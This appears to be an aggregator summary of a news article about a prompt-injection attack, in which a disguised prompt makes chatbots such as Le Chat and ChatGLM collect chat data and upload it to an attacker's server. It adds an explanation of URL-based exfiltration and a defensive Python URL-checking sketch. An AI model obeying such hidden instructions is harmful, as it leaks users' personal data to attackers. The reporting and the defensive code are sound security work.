BGR

Chatbot hack shows why you shouldn't trust AI with your personal data

Summary
Nutrition label: 62% Informative

Hackers created a prompt that would instruct a chatbot to collect data from your chats and upload it to a server.

Hackers can disguise malicious prompts as innocuous requests, such as asking the chatbot to write a cover letter for a job application.

The researchers got the hack working against Le Chat, from French AI company Mistral, and the Chinese chatbot ChatGLM.

A few weeks ago, we saw a similar hack that would have allowed attackers to extract data from ChatGPT chats.
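Attacks like this typically exfiltrate data by making the model emit a URL (for example, a markdown image link) whose query string carries the stolen text. Below is a minimal, hypothetical sketch of one partial mitigation: scanning a model response for links to domains outside an allow-list. The `ALLOWED_DOMAINS` set, the `find_suspicious_urls` helper, and the example response are illustrative assumptions, not details from the research.

```python
import re
from urllib.parse import urlparse

# Hypothetical allow-list of domains the assistant is permitted to link to.
ALLOWED_DOMAINS = {"example.com"}

# Matches http(s) URLs, stopping at whitespace, quotes, or a closing paren.
URL_RE = re.compile(r"https?://[^\s)\"']+")

def find_suspicious_urls(model_output: str) -> list[str]:
    """Return URLs in a model response whose host is outside the allow-list.

    Prompt-injection exfiltration often smuggles chat data out through a
    URL's query string; flagging unexpected domains is one simple,
    partial check, not a complete defense.
    """
    suspicious = []
    for url in URL_RE.findall(model_output):
        host = urlparse(url).hostname or ""
        if host not in ALLOWED_DOMAINS:
            suspicious.append(url)
    return suspicious

# A response smuggling data out via an image URL's query parameter:
response = "Here is your cover letter. ![x](https://attacker.test/log?d=name%3DJane)"
print(find_suspicious_urls(response))  # ['https://attacker.test/log?d=name%3DJane']
```

A real deployment would pair a check like this with output filtering on the server side, since an injected prompt can also instruct the model to obfuscate the URL.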

VR Score: 41
Informative language: 26
Neutral language: 50
Article tone: informal
Language: English
Language complexity: 44
Offensive language: not offensive
Hate speech: not hateful
Attention-grabbing headline: not detected
Known propaganda techniques: not detected
Time-value: long-living
Affiliate links: no affiliate links